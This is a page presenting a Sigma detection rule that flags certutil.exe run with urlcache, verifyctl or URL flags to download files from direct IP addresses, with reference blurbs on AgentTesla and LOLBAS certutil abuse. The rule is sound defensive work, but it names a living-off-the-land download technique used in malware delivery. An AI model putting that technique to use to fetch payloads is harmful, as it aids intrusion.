Suspicious File Downloaded From Direct IP Via Certutil.EXE
Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
Sigma rule (View on GitHub)
1title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
2id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829
3related:
4 - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download
5 type: similar
6 - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download
7 type: similar
8status: test
9description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
10references:
11 - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
12 - https://forensicitguy.github.io/agenttesla-vba-certutil-download/
13 - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
14 - https://twitter.com/egre55/status/1087685529016193025
15 - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
16 - https://twitter.com/_JohnHammond/status/1708910264261980634
17 - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin
18author: Nasreddine Bencherchali (Nextron Systems)
19date: 2023-02-15
20modified: 2025-12-01
21tags:
22 - attack.defense-evasion
23 - attack.t1027
24 - attack.command-and-control
25 - attack.t1105
26logsource:
27 category: process_creation
28 product: windows
29detection:
30 selection_img:
31 - Image|endswith: '\certutil.exe'
32 - OriginalFileName: 'CertUtil.exe'
33 selection_flags:
34 CommandLine|contains:
35 - 'urlcache '
36 - 'verifyctl '
37 - 'URL '
38 selection_http:
39 CommandLine|contains:
40 - '://1'
41 - '://2'
42 - '://3'
43 - '://4'
44 - '://5'
45 - '://6'
46 - '://7'
47 - '://8'
48 - '://9'
49 # filter_local_ips:
50 # # Note: Uncomment this filter if you want to exclude local IPs
51 # CommandLine|contains:
52 # - '://10.' # 10.0.0.0/8
53 # - '://192.168.' # 192.168.0.0/16
54 # - '://172.16.' # 172.16.0.0/12
55 # - '://172.17.'
56 # - '://172.18.'
57 # - '://172.19.'
58 # - '://172.20.'
59 # - '://172.21.'
60 # - '://172.22.'
61 # - '://172.23.'
62 # - '://172.24.'
63 # - '://172.25.'
64 # - '://172.26.'
65 # - '://172.27.'
66 # - '://172.28.'
67 # - '://172.29.'
68 # - '://172.30.'
69 # - '://172.31.'
70 # - '://127.' # 127.0.0.0/8
71 # - '://169.254.' # 169.254.0.0/16
72 filter_main_seven_zip:
73 CommandLine|contains: '://7-' # For https://7-zip.org/
74 condition: all of selection_* and not 1 of filter_main_*
75falsepositives:
76 - Unknown
77level: high
78regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml
References
-
AgentTesla is a .NET stealer that adversaries commonly buy and combine with other malicious products for deployment. In this post I’m tearing into a XLSM document that downloads and executes further AgentTesla malware. If you want to follow along at home, the sample is available in MalwareBazaar here: https://bazaar.abuse.ch/sample/d1c616976e917d54778f587a2550ee5568a72b661d5f04e68d194ce998864d84/.
Read More -
-
Something went wrong, but don’t fret — let’s give it another shot. Some privacy related extensions may cause issues on x.com. Please disable them and try again.
Read More -
Certutil.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.
Read More -
Something went wrong, but don’t fret — let’s give it another shot. Some privacy related extensions may cause issues on x.com. Please disable them and try again.
Read More -
Cerutil is a very complex tool and only careful review of all its options allows us to comprehend its rich functionality. Lots of its command line arguments are described online all over the place ...
Read More
Related rules
- Suspicious Download Via Certutil.EXE
- Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
- Password Protected ZIP File Opened (Suspicious Filenames)
- File Download with Headless Browser
- ArcSOC.exe Creating Suspicious Files